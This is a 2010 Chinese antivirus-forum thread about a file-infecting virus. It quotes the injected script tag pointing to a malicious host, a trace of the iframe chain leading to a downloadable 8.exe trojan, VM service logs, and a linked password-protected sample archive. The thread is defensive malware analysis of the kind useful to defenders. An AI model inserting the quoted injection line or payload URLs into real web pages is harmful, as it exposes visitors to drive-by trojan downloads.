瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » ping.exe rar.exe
sihaiweijia - 2010-2-9 23:11:00

附件: XP.rar (2010-2-9 23:10:42, 278.20 K)
该附件被下载次数 216

就是这个了

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
帅乖 - 2010-2-9 23:16:00
建议将可疑文件上报瑞星http://mailcenter.rising.com.cn/FileCheck/
豪斯登堡新郎 - 2010-2-9 23:29:00
感染可执行文件和网页文件,被感染可执行文件瑞星报毒Win32.Agent.ie,被感染网页文件瑞星报毒Hack.Exploit.Script.HTML.IFrame.az 

添加恶意代码:



引用:
<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>


Log is generated by FreShow.
[wide]http://web.nba1001.net:8888/tj/tongji.js
    [frame]http://web.nba1001.net:8888/tj/index.html
        [frame]http://web.nba1001.net:8888/tj/au.htm
            [object]http://bbb.nba1001.net:9090/ff/8.exe
        [frame]http://web.nba1001.net:8888/tj/ytu.htm
        [frame]http://web.nba1001.net:8888/tj/yut.htm

另外8.exe还会释放文件加载驱动,病下载木马群在本地计算机执行


瑞星可以清除病毒修复文件,请下载并安装瑞星杀毒软件更新至最新全盘杀毒
苍寒 - 2010-2-9 23:52:00
Task Scheduler / Schedule][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\system32\schedsvc.dll><N/A>
[Secondary Logon / seclogon][Stopped/Disabled]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\seclogon.dll><Microsoft Corporation>
[System Event Notification / SENS][Running/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k netsvcs-->%SystemRoot%\system32\sens.dll><Microsoft Corporation>
[Windows Firewall/Internet Connection Sharing (ICS) / SharedAccess][Running/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k netsvcs-->%SystemRoot%\System32\ipnathlp.dll><Microsoft Corporation>
[Shell Hardware Detection / ShellHWDetection][Running/Auto Start]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\shsvcs.dll><Microsoft Corporation>
[Print Spooler / Spooler][Running/Auto Start]
  <C:\WINDOWS\system32\spoolsv.exe><Microsoft Corporation>
[System Restore Service / srservice][Running/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\srsvc.dll><Microsoft Corporation>
[SSDP Discovery Service / SSDPSRV][Running/Manual Start]
  <C:\WINDOWS\system32\svchost.exe -k LocalService-->%SystemRoot%\System32\ssdpsrv.dll><Microsoft Corporation>
[Windows Image Acquisition (WIA) / stisvc][Stopped/Disabled]
  <C:\WINDOWS\system32\svchost.exe -k imgsvc-->%SystemRoot%\system32\wiaservc.dll><Microsoft Corporation>
[MS Software Shadow Copy Provider / SwPrv][Stopped/Disabled]
  <C:\WINDOWS\system32\dllhost.exe /Processid:{E3389BFF-9590-4B29-8B88-18E6AD4FA0FB}><Microsoft Corporation>
[Performance Logs and Alerts / SysmonLog][Stopped/Manual Start]
  <C:\WINDOWS\system32\smlogsvc.exe><Microsoft Corporation>
[Telephony / TapiSrv][Running/Manual Start]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\tapisrv.dll><Microsoft Corporation>
[Terminal Services / TermService][Stopped/Disabled]
  <C:\WINDOWS\System32\svchost -k DComLaunch-->%SystemRoot%\System32\termsrv.dll><Microsoft Corporation>
[Themes / Themes][Running/Auto Start]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\shsvcs.dll><Microsoft Corporation>
[Telnet / TlntSvr][Stopped/Disabled]
  <C:\WINDOWS\system32\tlntsvr.exe><Microsoft Corporation>
[Distributed Link Tracking Client / TrkWks][Stopped/Disabled]
  <C:\WINDOWS\system32\svchost.exe -k netsvcs-->%SystemRoot%\system32\trkwks.dll><Microsoft Corporation>
[Universal Plug and Play Device Host / upnphost][Running/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k LocalService-->%SystemRoot%\System32\upnphost.dll><Microsoft Corporation>
[Uninterruptible Power Supply / UPS][Stopped/Disabled]
  <C:\WINDOWS\System32\ups.exe><Microsoft Corporation>
[Volume Shadow Copy / VSS][Stopped/Disabled]
  <C:\WINDOWS\System32\vssvc.exe><Microsoft Corporation>
[Windows Time / W32Time][Stopped/Disabled]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\w32time.dll><Microsoft Corporation>
[WebClient / WebClient][Stopped/Disabled]
  <C:\WINDOWS\system32\svchost.exe -k LocalService-->%SystemRoot%\System32\webclnt.dll><Microsoft Corporation>
[Windows Management Instrumentation / winmgmt][Running/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k netsvcs-->%SystemRoot%\system32\wbem\WMIsvc.dll><Microsoft Corporation>
[Portable Media Serial Number Service / WmdmPmSN][Stopped/Manual Start]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\MsPMSNSv.dll><N/A>
[Windows Management Instrumentation Driver Extensions / Wmi][Stopped/Manual Start]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\advapi32.dll><Microsoft Corporation>
[WMI Performance Adapter / WmiApSrv][Stopped/Manual Start]
  <C:\WINDOWS\system32\wbem\wmiapsrv.exe><Microsoft Corporation>
[Windows Media Player Network Sharing Service / WMPNetworkSvc][Stopped/Disabled]
  <"C:\Program Files\Windows Media Player\WMPNetwk.exe"><Microsoft Corporation>
[Security Center / wscsvc][Stopped/Disabled]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SYSTEMROOT%\system32\wscsvc.dll><Microsoft Corporation>
[Automatic Updates / wuauserv][Running/Auto Start]
  <C:\WINDOWS\system32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\wuauserv.dll><Microsoft Corporation>
[Windows Driver Foundation - User-mode Driver Framework / WudfSvc][Stopped/Manual Start]
  <C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup-->%SystemRoot%\System32\WUDFSvc.dll><Microsoft Corporation>
[Wireless Zero Configuration / WZCSVC][Running/Auto Start]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\wzcsvc.dll><Microsoft Corporation>
[Network Provisioning Service / xmlprov][Stopped/Manual Start]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\xmlprov.dll><N/A>


其他的不能确定,但是 <C:\WINDOWS\System32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\MsPMSNSv.dll
><N/A>
MsPMSNSv.dll是病毒====Trojan.Win32.Generic.11F92F6C
wuauserv.exe 也是病毒

我在VM虚拟机下运行病毒,断网得到的日志
服务
[Background Intelligent Transfer Service / BITS][Stopped/Auto Start]
<C:\WINDOWS\system32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\qmgr.dll><N/A>===瑞星不报
[Human Interface Device Access / HidServ][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[TP AutoConnect Service / TPAutoConnSvc][Stopped/Manual Start]
  <"C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"><ThinPrint GmbH>
[VMware Tools Service / VMTools][Running/Auto Start]
  <"C:\Program Files\VMware\VMware Tools\VMwareService.exe"><VMware, Inc.>
[Portable Media Serial Number Service / WmdmPmSN][Stopped/Manual Start]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\MsPMSNSv.dll><N/A>

虽然不知道netsvcs这是啥意思,好像是指向其他文件(模块)

因此,建议楼主用最新版杀毒软件进行杀毒!
辛达星郁 - 2010-2-10 8:18:00
Log is generated by FreShow.
[wide]http://web.nba1001.net:8888/tj/tongji.js
    [frame]http://web.nba1001.net:8888/tj/index.html
        [frame]http://web.nba1001.net:8888/tj/au.htm
            [object]http://bbb.nba1001.net:9090/ff/8.exe
        [frame]http://web.nba1001.net:8888/tj/ytu.htm
        [frame]http://web.nba1001.net:8888/tj/yut.htm
            [frame]http://web.nba1001.net:8888/tj/yt.htm
样本下载下来了。
密码123

附件: 病毒样本.rar
sihaiweijia - 2010-2-10 11:48:00
大家能给介绍个能分析病毒样本的软件吗?就是能看出病毒运行后b的所有动作,谢谢帮助!
12
查看完整版本: ping.exe rar.exe
© 2000 - 2025 Rising Corp. Ltd.